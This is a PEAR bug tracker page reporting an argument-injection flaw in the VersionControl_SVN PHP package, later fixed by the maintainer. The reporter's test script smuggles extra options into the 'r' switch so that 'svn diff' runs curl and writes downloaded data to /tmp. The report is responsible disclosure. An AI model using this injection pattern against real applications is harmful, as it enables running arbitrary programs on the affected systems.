Package home | Report new bug | New search | Development Roadmap Status: Open | Feedback | All | Closed Since Version 0.5.2

Bug #19776 switch handling argument injection bug
Submitted: 2013-01-05 06:21 UTC
From: ulfharn Assigned: mrook
Status: Closed Package: VersionControl_SVN (version 0.5.0)
PHP Version: 5.4.6 OS: Ubuntu 12.10 x64
Roadmaps: 0.5.1    
Subscription  


Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know! Just going to say 'Me too!'? Don't clutter the database with that please !
Your email address:
MUST BE VALID
Solve the problem : 35 - 6 = ?

 
 [2013-01-05 06:21 UTC] ulfharn (Ulf Harnhammar)
Description: ------------ Hi, I have found a smaller security issue in VersionControl_SVN. Data in switches with values isn't quoted sufficiently before it is used for constructing the command line. This can be abused to inject malicious arguments to svn subcommands and execute arbitrary programs. I have included a test script that injects data in the 'r' switch, in such a way that the 'svn diff' command will not diff anything but instead use curl to download data from a specific URL to a specific path. If we imagine that this 'r' switch data is untrusted and comes from a remote user, there might be a problem here. The bug will probably also manifest itself in other places than 'r' and 'diff'. I have also included a patch. It fixes the problem but I haven't tested it a lot so it might break something else. Beware. // Ulf Harnhammar Test script: --------------- <?php require_once 'VersionControl/SVN.php'; $options = array('fetchmode' => VERSIONCONTROL_SVN_FETCHMODE_RAW); // otherwise diff gets confused $svn = VersionControl_SVN::factory(array('checkout', 'diff'), $options); $switches = array(); $args = array('http://plugins.svn.wordpress.org/simple-fields/trunk/'); // just any svn repo $svn->checkout->run($args, $switches); $fp = fopen('trunk/functions.php', 'a'); // change something, so diff/status finds changes fputs($fp, "// unif\n"); fclose($fp); $args2 = array('trunk'); $switches2 = array('r' => '648105 --diff-cmd curl --extensions "http://pear.php.net -o /tmp/peardata"'); // here we're injecting additional parameters to the "svn diff" command // if the value for this 'r' switch comes from an untrusted source, this is a problem $svn->diff->run($args2, $switches2); // it will crash here, but if one looks at /tmp/peardata, one will see that it does contain the data // from pear.php.net Expected result: ---------------- It should check out one repo, add one line of data to a file, and then bug out with an error message saying that the revision number is invalid. Actual result: -------------- It checks out one repo, adds one line of data to a file, tries to perform a "svn diff" but gets sidetracked into downloading pear.php.net to /tmp/peardata instead, after which it crashes.

Comments

 [2013-01-05 06:24 UTC] ulfharn (Ulf Harnhammar)
 [2013-01-17 12:34 UTC] mrook (Michiel Rook)
-Status: Open +Status: Assigned -Roadmap Versions: +Roadmap Versions: 0.5.1
 [2013-01-19 21:15 UTC] mrook (Michiel Rook)
-Status: Open +Status: Closed -Assigned To: +Assigned To: mrook
This bug has been fixed in SVN. If this was a documentation problem, the fix will appear on pear.php.net by the end of next Sunday (CET). If this was a problem with the pear.php.net website, the change should be live shortly. Otherwise, the fix will appear in the package's next release. Thank you for the report and for helping us make PEAR better.